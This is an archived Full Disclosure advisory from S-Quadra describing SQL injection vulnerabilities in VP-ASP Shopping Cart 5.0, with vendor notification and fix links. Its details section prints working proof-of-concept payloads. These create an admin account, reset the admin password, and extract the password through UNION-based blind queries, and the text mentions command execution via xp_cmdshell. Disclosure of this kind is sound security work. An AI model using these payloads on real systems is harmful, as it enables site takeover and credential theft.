Full Disclosure mailing list archives
Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities
From: S-Quadra Security Research <research () s-quadra com>
Date: Mon, 01 Dec 2003 16:15:53 +0300
S-Quadra Advisory #2003-11-28Topic: Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities
Severity: Average Vendor URL: http://www.vpasp.com Advisory URL: http://www.s-quadra.com/advisories/Adv-20031128.txt Release date: 28 Nov 2003 1. DESCRIPTIONVirtual Programming VP-ASP is a shopping cart application for e-commerce enabled sites. It is written in ASP, supports the following databases: Access, MSSQL, MYSQL
on Windows and MYSQL on Unix.VP-ASP suffers from SQL injection vulnerabilities, which may allow an attacker in some cases to gain administrative access to the installed VP-ASP Shopping Cart software
or execute arbitrary commands on a target's system. 2. DETAILS -- Vulnerability 1: SQL Injection vulnerability in 'shopsearch.asp' script An SQL Injection vulnerability has been found in the shopsearch.asp script.User supplied input is not filtered before being used in a SQL query. Consequently, query modification using malformed input is possible. Exploitation of the vulnerability allows a remote attacker to insert a new user with administrative privileges. A more sophisticated exploitation would allow a remote attacker to execute arbitrary commands
on a target's system (via MSSQL xp_cmdshell() function for example). -- PoC code 1: Platform: Win32/MSSQL Posting this data to shopsearch.asp creates new administrative accountKeyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6 Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Posting this data to shopsearch.asp changes admin passwordKeyword=&category=5); update tbluser set fldpassword='edsaqw' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
-- Vulnerability 2: SQL Injection vulnerability in 'shopdisplayproducts.asp' script
An SQL Injection vulnerability has been found in the shopdisplayproducts.asp script. Exploitation of the vulnerability will allow remote attacker to read any information from a database.
-- PoC code 2: Platform: Win32/MSSQL http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%20fldpassword%20like%20'a%25'-- changing value at the end of request %20'a%25'-- %20'b%25'-- %20'c%25'-- ...and looking through the HTTP response from VP-ASP web server attacker can find the admin password.
3. FIX INFORMATIONS-Quadra alerted VP-ASP development team to this issue on 28th November 2003.
Security fixes from VP-ASP development team available at http://www.vpasp.com/virtprog/info/faq_securityfixes.htm 4. CREDITS Nick Gudov <cipher () s-quadra com> is responsible for discovering this issue. 5. ABOUT S-Quadra offers services in computer security, penetration testing andnetwork assesment, web application security, source code review and third party product
vulnerability assesment, forensic support and reverse engineering. Security is an art and our goal is to bring responsible and high qualitysecurity service to the IT market, customized to meet the unique needs of each
individual client. S-Quadra, (pronounced es quadra), is not an acronym. It's unique, creative and innovative - just like the security services we bring to our clients. S-Quadra Advisory #2003-11-28 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection Vulnerabilities S-Quadra Security Research (Dec 01)